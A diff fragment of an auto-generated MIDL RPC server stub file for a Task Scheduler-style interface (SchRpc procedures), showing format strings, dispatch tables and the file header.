_SchRpcGetNumberOfMissedRuns */ - - - /* Return value */ - -/* 1110 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 1112 */ NdrFcLong( 0x0 ), /* 0 */ -/* 1116 */ NdrFcShort( 0x12 ), /* 18 */ -/* 1118 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 1120 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 1122 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 1124 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1126 */ NdrFcShort( 0x24 ), /* 36 */ -/* 1128 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x3, /* 3 */ -/* 1130 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 1132 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1134 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1136 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1138 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 1140 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 1142 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 1144 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 1146 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 1148 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 1150 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 1152 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 1154 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 1156 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcEnableTask */ - - - /* Return value */ - -/* 1158 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 1160 */ NdrFcLong( 0x0 ), /* 0 */ -/* 1164 */ NdrFcShort( 0x13 ), /* 19 */ -/* 1166 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 1168 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 1170 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 1172 */ NdrFcShort( 0x8 ), /* 8 */ -/* 1174 */ NdrFcShort( 0x8 ), /* 8 */ -/* 1176 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x3, /* 3 */ -/* 1178 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 1180 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1182 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1184 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1186 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 1188 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 1190 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 1192 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 1194 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 1196 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 1198 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 1200 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 1202 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 1204 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - 0x0 - } - }; - -static const rpc_MIDL_TYPE_FORMAT_STRING rpc__MIDL_TypeFormatString = - { - 0, - { - NdrFcShort( 0x0 ), /* 0 */ -/* 2 */ - 0x11, 0xc, /* FC_RP [alloced_on_stack] [simple_pointer] */ -/* 4 */ 0x8, /* FC_LONG */ - 0x5c, /* FC_PAD */ -/* 6 */ - 0x12, 0x8, /* FC_UP [simple_pointer] */ -/* 8 */ - 0x25, /* FC_C_WSTRING */ - 0x5c, /* FC_PAD */ -/* 10 */ - 0x11, 0x8, /* FC_RP [simple_pointer] */ -/* 12 */ - 0x25, /* FC_C_WSTRING */ - 0x5c, /* FC_PAD */ -/* 14 */ - 0x12, 0x0, /* FC_UP */ -/* 16 */ NdrFcShort( 0x18 ), /* Offset= 24 (40) */ -/* 18 */ - 0x1a, /* FC_BOGUS_STRUCT */ - 0x3, /* 3 */ -/* 20 */ NdrFcShort( 0x18 ), /* 24 */ -/* 22 */ NdrFcShort( 0x0 ), /* 0 */ -/* 24 */ NdrFcShort( 0x8 ), /* Offset= 8 (32) */ -/* 26 */ 0x36, /* FC_POINTER */ - 0x36, /* FC_POINTER */ -/* 28 */ 0x8, /* FC_LONG */ - 0x40, /* FC_STRUCTPAD4 */ -/* 30 */ 0x5c, /* FC_PAD */ - 0x5b, /* FC_END */ -/* 32 */ - 0x12, 0x8, /* FC_UP [simple_pointer] */ -/* 34 */ - 0x25, /* FC_C_WSTRING */ - 0x5c, /* FC_PAD */ -/* 36 */ - 0x12, 0x8, /* FC_UP [simple_pointer] */ -/* 38 */ - 0x25, /* FC_C_WSTRING */ - 0x5c, /* FC_PAD */ -/* 40 */ - 0x21, /* FC_BOGUS_ARRAY */ - 0x3, /* 3 */ -/* 42 */ NdrFcShort( 0x0 ), /* 0 */ -/* 44 */ 0x28, /* Corr desc: parameter, FC_LONG */ - 0x0, /* */ -/* 46 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 48 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ -/* 50 */ NdrFcLong( 0xffffffff ), /* -1 */ -/* 54 */ NdrFcShort( 0x0 ), /* Corr flags: */ -/* 56 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ - 0x0, /* 0 */ -/* 58 */ NdrFcShort( 0xffd8 ), /* Offset= -40 (18) */ -/* 60 */ 0x5c, /* FC_PAD */ - 0x5b, /* FC_END */ -/* 62 */ - 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ -/* 64 */ NdrFcShort( 0xffc6 ), /* Offset= -58 (6) */ -/* 66 */ - 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ -/* 68 */ NdrFcShort( 0x2 ), /* Offset= 2 (70) */ -/* 70 */ - 0x12, 0x0, /* FC_UP */ -/* 72 */ NdrFcShort( 0x2 ), /* Offset= 2 (74) */ -/* 74 */ - 0x1a, /* FC_BOGUS_STRUCT */ - 0x3, /* 3 */ -/* 76 */ NdrFcShort( 0x18 ), /* 24 */ -/* 78 */ NdrFcShort( 0x0 ), /* 0 */ -/* 80 */ NdrFcShort( 0x8 ), /* Offset= 8 (88) */ -/* 82 */ 0x8, /* FC_LONG */ - 0x8, /* FC_LONG */ -/* 84 */ 0x36, /* FC_POINTER */ - 0x36, /* FC_POINTER */ -/* 86 */ 0x5c, /* FC_PAD */ - 0x5b, /* FC_END */ -/* 88 */ - 0x12, 0x8, /* FC_UP [simple_pointer] */ -/* 90 */ - 0x25, /* FC_C_WSTRING */ - 0x5c, /* FC_PAD */ -/* 92 */ - 0x12, 0x8, /* FC_UP [simple_pointer] */ -/* 94 */ - 0x25, /* FC_C_WSTRING */ - 0x5c, /* FC_PAD */ -/* 96 */ - 0x11, 0x8, /* FC_RP [simple_pointer] */ -/* 98 */ 0x8, /* FC_LONG */ - 0x5c, /* FC_PAD */ -/* 100 */ - 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ -/* 102 */ NdrFcShort( 0x2 ), /* Offset= 2 (104) */ -/* 104 */ - 0x12, 0x0, /* FC_UP */ -/* 106 */ NdrFcShort( 0x2 ), /* Offset= 2 (108) */ -/* 108 */ - 0x21, /* FC_BOGUS_ARRAY */ - 0x3, /* 3 */ -/* 110 */ NdrFcShort( 0x0 ), /* 0 */ -/* 112 */ 0x28, /* Corr desc: parameter, FC_LONG */ - 0x54, /* FC_DEREFERENCE */ -/* 114 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 116 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ -/* 118 */ NdrFcLong( 0xffffffff ), /* -1 */ -/* 122 */ NdrFcShort( 0x0 ), /* Corr flags: */ -/* 124 */ - 0x12, 0x8, /* FC_UP [simple_pointer] */ -/* 126 */ - 0x25, /* FC_C_WSTRING */ - 0x5c, /* FC_PAD */ -/* 128 */ 0x5c, /* FC_PAD */ - 0x5b, /* FC_END */ -/* 130 */ - 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ -/* 132 */ NdrFcShort( 0x2 ), /* Offset= 2 (134) */ -/* 134 */ - 0x12, 0x0, /* FC_UP */ -/* 136 */ NdrFcShort( 0x14 ), /* Offset= 20 (156) */ -/* 138 */ - 0x1d, /* FC_SMFARRAY */ - 0x0, /* 0 */ -/* 140 */ NdrFcShort( 0x8 ), /* 8 */ -/* 142 */ 0x1, /* FC_BYTE */ - 0x5b, /* FC_END */ -/* 144 */ - 0x15, /* FC_STRUCT */ - 0x3, /* 3 */ -/* 146 */ NdrFcShort( 0x10 ), /* 16 */ -/* 148 */ 0x8, /* FC_LONG */ - 0x6, /* FC_SHORT */ -/* 150 */ 0x6, /* FC_SHORT */ - 0x4c, /* FC_EMBEDDED_COMPLEX */ -/* 152 */ 0x0, /* 0 */ - NdrFcShort( 0xfff1 ), /* Offset= -15 (138) */ - 0x5b, /* FC_END */ -/* 156 */ - 0x21, /* FC_BOGUS_ARRAY */ - 0x3, /* 3 */ -/* 158 */ NdrFcShort( 0x0 ), /* 0 */ -/* 160 */ 0x28, /* Corr desc: parameter, FC_LONG */ - 0x54, /* FC_DEREFERENCE */ -/* 162 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 164 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ -/* 166 */ NdrFcLong( 0xffffffff ), /* -1 */ -/* 170 */ NdrFcShort( 0x0 ), /* Corr flags: */ -/* 172 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ - 0x0, /* 0 */ -/* 174 */ NdrFcShort( 0xffe2 ), /* Offset= -30 (144) */ -/* 176 */ 0x5c, /* FC_PAD */ - 0x5b, /* FC_END */ -/* 178 */ - 0x11, 0x0, /* FC_RP */ -/* 180 */ NdrFcShort( 0xffdc ), /* Offset= -36 (144) */ -/* 182 */ - 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ -/* 184 */ NdrFcShort( 0x2 ), /* Offset= 2 (186) */ -/* 186 */ - 0x12, 0x0, /* FC_UP */ -/* 188 */ NdrFcShort( 0x2 ), /* Offset= 2 (190) */ -/* 190 */ - 0x21, /* FC_BOGUS_ARRAY */ - 0x3, /* 3 */ -/* 192 */ NdrFcShort( 0x0 ), /* 0 */ -/* 194 */ 0x28, /* Corr desc: parameter, FC_LONG */ - 0x54, /* FC_DEREFERENCE */ -/* 196 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 198 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ -/* 200 */ NdrFcLong( 0xffffffff ), /* -1 */ -/* 204 */ NdrFcShort( 0x0 ), /* Corr flags: */ -/* 206 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ - 0x0, /* 0 */ -/* 208 */ NdrFcShort( 0xffc0 ), /* Offset= -64 (144) */ -/* 210 */ 0x5c, /* FC_PAD */ - 0x5b, /* FC_END */ -/* 212 */ - 0x12, 0x0, /* FC_UP */ -/* 214 */ NdrFcShort( 0x2 ), /* Offset= 2 (216) */ -/* 216 */ - 0x21, /* FC_BOGUS_ARRAY */ - 0x3, /* 3 */ -/* 218 */ NdrFcShort( 0x0 ), /* 0 */ -/* 220 */ 0x28, /* Corr desc: parameter, FC_LONG */ - 0x0, /* */ -/* 222 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 224 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ -/* 226 */ NdrFcLong( 0xffffffff ), /* -1 */ -/* 230 */ NdrFcShort( 0x0 ), /* Corr flags: */ -/* 232 */ - 0x12, 0x8, /* FC_UP [simple_pointer] */ -/* 234 */ - 0x25, /* FC_C_WSTRING */ - 0x5c, /* FC_PAD */ -/* 236 */ 0x5c, /* FC_PAD */ - 0x5b, /* FC_END */ -/* 238 */ - 0x11, 0x4, /* FC_RP [alloced_on_stack] */ -/* 240 */ NdrFcShort( 0xffa0 ), /* Offset= -96 (144) */ -/* 242 */ - 0x12, 0x0, /* FC_UP */ -/* 244 */ NdrFcShort( 0x2 ), /* Offset= 2 (246) */ -/* 246 */ - 0x15, /* FC_STRUCT */ - 0x1, /* 1 */ -/* 248 */ NdrFcShort( 0x10 ), /* 16 */ -/* 250 */ 0x6, /* FC_SHORT */ - 0x6, /* FC_SHORT */ -/* 252 */ 0x6, /* FC_SHORT */ - 0x6, /* FC_SHORT */ -/* 254 */ 0x6, /* FC_SHORT */ - 0x6, /* FC_SHORT */ -/* 256 */ 0x6, /* FC_SHORT */ - 0x6, /* FC_SHORT */ -/* 258 */ 0x5c, /* FC_PAD */ - 0x5b, /* FC_END */ -/* 260 */ - 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ -/* 262 */ NdrFcShort( 0x2 ), /* Offset= 2 (264) */ -/* 264 */ - 0x12, 0x0, /* FC_UP */ -/* 266 */ NdrFcShort( 0x2 ), /* Offset= 2 (268) */ -/* 268 */ - 0x21, /* FC_BOGUS_ARRAY */ - 0x1, /* 1 */ -/* 270 */ NdrFcShort( 0x0 ), /* 0 */ -/* 272 */ 0x28, /* Corr desc: parameter, FC_LONG */ - 0x54, /* FC_DEREFERENCE */ -/* 274 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 276 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ -/* 278 */ NdrFcLong( 0xffffffff ), /* -1 */ -/* 282 */ NdrFcShort( 0x0 ), /* Corr flags: */ -/* 284 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ - 0x0, /* 0 */ -/* 286 */ NdrFcShort( 0xffd8 ), /* Offset= -40 (246) */ -/* 288 */ 0x5c, /* FC_PAD */ - 0x5b, /* FC_END */ -/* 290 */ - 0x11, 0x4, /* FC_RP [alloced_on_stack] */ -/* 292 */ NdrFcShort( 0xffd2 ), /* Offset= -46 (246) */ - - 0x0 - } - }; - -static const unsigned short DefaultIfName_FormatStringOffsetTable[] = - { - 0, - 42, - 132, - 192, - 246, - 300, - 354, - 426, - 498, - 558, - 642, - 690, - 738, - 816, - 864, - 918, - 996, - 1050, - 1110, - 1158 - }; - - -static const MIDL_STUB_DESC DefaultIfName_StubDesc = - { - (void *)& DefaultIfName___RpcServerInterface, - MIDL_user_allocate, - MIDL_user_free, - 0, - 0, - 0, - 0, - 0, - rpc__MIDL_TypeFormatString.Format, - 1, /* -error bounds_check flag */ - 0x50002, /* Ndr library version */ - 0, - 0x800025b, /* MIDL Version 8.0.603 */ - 0, - 0, - 0, /* notify & notify_flag routine table */ - 0x1, /* MIDL flag */ - 0, /* cs routines */ - 0, /* proxy/server info */ - 0 - }; - -static const RPC_DISPATCH_FUNCTION DefaultIfName_table[] = - { - NdrServerCall2, - NdrServerCall2, - NdrServerCall2, - NdrServerCall2, - NdrServerCall2, - NdrServerCall2, - NdrServerCall2, - NdrServerCall2, - NdrServerCall2, - NdrServerCall2, - NdrServerCall2, - NdrServerCall2, - NdrServerCall2, - NdrServerCall2, - NdrServerCall2, - NdrServerCall2, - NdrServerCall2, - NdrServerCall2, - NdrServerCall2, - NdrServerCall2, - 0 - }; -static const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable = - { - 20, - (RPC_DISPATCH_FUNCTION*)DefaultIfName_table - }; - -static const SERVER_ROUTINE DefaultIfName_ServerRoutineTable[] = - { - (SERVER_ROUTINE)_SchRpcHighestVersion, - (SERVER_ROUTINE)_SchRpcRegisterTask, - (SERVER_ROUTINE)SchRpcRetrieveTask, - (SERVER_ROUTINE)_SchRpcCreateFolder, - (SERVER_ROUTINE)_SchRpcSetSecurity, - (SERVER_ROUTINE)_SchRpcGetSecurity, - (SERVER_ROUTINE)_SchRpcEnumFolders, - (SERVER_ROUTINE)_SchRpcEnumTasks, - (SERVER_ROUTINE)_SchRpcEnumInstances, - (SERVER_ROUTINE)_SchRpcGetInstanceInfo, - (SERVER_ROUTINE)_SchRpcStopInstance, - (SERVER_ROUTINE)_SchRpcStop, - (SERVER_ROUTINE)_SchRpcRun, - (SERVER_ROUTINE)_SchRpcDelete, - (SERVER_ROUTINE)_SchRpcRename, - (SERVER_ROUTINE)_SchRpcScheduledRuntimes, - (SERVER_ROUTINE)_SchRpcGetLastRunInfo, - (SERVER_ROUTINE)_SchRpcGetTaskInfo, - (SERVER_ROUTINE)_SchRpcGetNumberOfMissedRuns, - (SERVER_ROUTINE)_SchRpcEnableTask - }; - -static const MIDL_SERVER_INFO DefaultIfName_ServerInfo = - { - &DefaultIfName_StubDesc, - DefaultIfName_ServerRoutineTable, - rpc__MIDL_ProcFormatString.Format, - DefaultIfName_FormatStringOffsetTable, - 0, - 0, - 0, - 0}; -#if _MSC_VER >= 1200 -#pragma warning(pop) -#endif - - -#endif /* defined(_M_AMD64)*/ - + + +/* this ALWAYS GENERATED file contains the RPC server stubs */ + + + /* File created by MIDL compiler version 8.00.0603 */ +/* at Mon Sep 17 17:16:17 2018 + */ +/* Compiler settings for rpc.idl: + Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 + protocol : dce , ms_ext, c_ext, robust + error checks: allocation ref bounds_check enum stub_data + VC __declspec() decoration level: + __declspec(uuid()), __declspec(selectany), __declspec(novtable) + DECLSPEC_UUID(), MIDL_INTERFACE() +*/ +/* @@MIDL_FILE_HEADING( ) */ + +#if defined(_M_AMD64) + + +#pragma warning( disable: 4049 ) /* more than 64k source lines */ +#if _MSC_VER >= 1200 +#pragma warning(push) +#endif + +#pragma warning( disable: 4211 ) /* redefine extern to static */ +#pragma warning( disable: 4232 ) /* dllimport identity*/ +#pragma warning( disable: 4024 ) /* array to pointer mapping*/ + +#include +#include "rpc_h.h" + +#define TYPE_FORMAT_STRING_SIZE 295 +#define PROC_FORMAT_STRING_SIZE 1207 +#define EXPR_FORMAT_STRING_SIZE 1 +#define TRANSMIT_AS_TABLE_SIZE 0 +#define WIRE_MARSHAL_TABLE_SIZE 0 + +typedef struct _rpc_MIDL_TYPE_FORMAT_STRING + { + short Pad; + unsigned char Format[ TYPE_FORMAT_STRING_SIZE ]; + } rpc_MIDL_TYPE_FORMAT_STRING; + +typedef struct _rpc_MIDL_PROC_FORMAT_STRING + { + short Pad; + unsigned char Format[ PROC_FORMAT_STRING_SIZE ]; + } rpc_MIDL_PROC_FORMAT_STRING; + +typedef struct _rpc_MIDL_EXPR_FORMAT_STRING + { + long Pad; + unsigned char Format[ EXPR_FORMAT_STRING_SIZE ]; + } rpc_MIDL_EXPR_FORMAT_STRING; + + +static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = +{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}; + +extern const rpc_MIDL_TYPE_FORMAT_STRING rpc__MIDL_TypeFormatString; +extern const rpc_MIDL_PROC_FORMAT_STRING rpc__MIDL_ProcFormatString; +extern const rpc_MIDL_EXPR_FORMAT_STRING rpc__MIDL_ExprFormatString; + +/* Standard interface: DefaultIfName, ver. 1.0, + GUID={0x86d35949,0x83c9,0x4044,{0xb4,0x24,0xdb,0x36,0x32,0x31,0xfd,0x0c}} */ + + +extern const MIDL_SERVER_INFO DefaultIfName_ServerInfo; + +extern const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable; + +static const RPC_SERVER_INTERFACE DefaultIfName___RpcServerInterface = + { + sizeof(RPC_SERVER_INTERFACE), + {{0x86d35949,0x83c9,0x4044,{0xb4,0x24,0xdb,0x36,0x32,0x31,0xfd,0x0c}},{1,0}}, + {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, + (RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable, + 0, + 0, + 0, + &DefaultIfName_ServerInfo, + 0x04000000 + }; +RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcServerInterface; + +extern const MIDL_STUB_DESC DefaultIfName_StubDesc; + + +#if !defined(__RPC_WIN64__) +#error Invalid build platform for this stub. +#endif + +static const rpc_MIDL_PROC_FORMAT_STRING rpc__MIDL_ProcFormatString = + { + 0, + { + + /* Procedure _SchRpcHighestVersion */ + + 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 2 */ NdrFcLong( 0x0 ), /* 0 */ +/* 6 */ NdrFcShort( 0x0 ), /* 0 */ +/* 8 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 14 */ NdrFcShort( 0x0 ), /* 0 */ +/* 16 */ NdrFcShort( 0x24 ), /* 36 */ +/* 18 */ 0x44, /* Oi2 Flags: has return, has ext, */ + 0x2, /* 2 */ +/* 20 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 22 */ NdrFcShort( 0x0 ), /* 0 */ +/* 24 */ NdrFcShort( 0x0 ), /* 0 */ +/* 26 */ NdrFcShort( 0x0 ), /* 0 */ +/* 28 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 30 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 34 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_1 */ + +/* 36 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 38 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 40 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcRegisterTask */ + + + /* Return value */ + +/* 42 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 44 */ NdrFcLong( 0x0 ), /* 0 */ +/* 48 */ NdrFcShort( 0x1 ), /* 1 */ +/* 50 */ NdrFcShort( 0x58 ), /* X64 Stack size/offset = 88 */ +/* 52 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 54 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 56 */ NdrFcShort( 0x18 ), /* 24 */ +/* 58 */ NdrFcShort( 0x8 ), /* 8 */ +/* 60 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ + 0xa, /* 10 */ +/* 62 */ 0xa, /* 10 */ + 0x5, /* Ext Flags: new corr desc, srv corr check, */ +/* 64 */ NdrFcShort( 0x0 ), /* 0 */ +/* 66 */ NdrFcShort( 0x1 ), /* 1 */ +/* 68 */ NdrFcShort( 0x0 ), /* 0 */ +/* 70 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 72 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ +/* 74 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 76 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ + + /* Parameter arg_1 */ + +/* 78 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 80 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 82 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_2 */ + +/* 84 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 86 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 88 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 90 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ +/* 92 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 94 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ + + /* Parameter arg_4 */ + +/* 96 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 98 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 100 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_5 */ + +/* 102 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 104 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 106 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_6 */ + +/* 108 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ +/* 110 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ +/* 112 */ NdrFcShort( 0xe ), /* Type Offset=14 */ + + /* Parameter arg_7 */ + +/* 114 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 116 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ +/* 118 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ + + /* Parameter arg_8 */ + +/* 120 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 122 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ +/* 124 */ NdrFcShort( 0x42 ), /* Type Offset=66 */ + + /* Parameter arg_9 */ + +/* 126 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 128 */ NdrFcShort( 0x50 ), /* X64 Stack size/offset = 80 */ +/* 130 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure SchRpcRetrieveTask */ + + + /* Return value */ + +/* 132 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 134 */ NdrFcLong( 0x0 ), /* 0 */ +/* 138 */ NdrFcShort( 0x2 ), /* 2 */ +/* 140 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 142 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 144 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 146 */ NdrFcShort( 0x1c ), /* 28 */ +/* 148 */ NdrFcShort( 0x8 ), /* 8 */ +/* 150 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ + 0x5, /* 5 */ +/* 152 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 154 */ NdrFcShort( 0x0 ), /* 0 */ +/* 156 */ NdrFcShort( 0x0 ), /* 0 */ +/* 158 */ NdrFcShort( 0x0 ), /* 0 */ +/* 160 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 162 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 164 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 166 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 168 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 170 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 172 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_2 */ + +/* 174 */ NdrFcShort( 0x148 ), /* Flags: in, base type, simple ref, */ +/* 176 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 178 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 180 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 182 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 184 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ + + /* Parameter arg_4 */ + +/* 186 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 188 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 190 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcCreateFolder */ + + + /* Return value */ + +/* 192 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 194 */ NdrFcLong( 0x0 ), /* 0 */ +/* 198 */ NdrFcShort( 0x3 ), /* 3 */ +/* 200 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 202 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 204 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 206 */ NdrFcShort( 0x8 ), /* 8 */ +/* 208 */ NdrFcShort( 0x8 ), /* 8 */ +/* 210 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x4, /* 4 */ +/* 212 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 214 */ NdrFcShort( 0x0 ), /* 0 */ +/* 216 */ NdrFcShort( 0x0 ), /* 0 */ +/* 218 */ NdrFcShort( 0x0 ), /* 0 */ +/* 220 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 222 */ NdrFcShort( 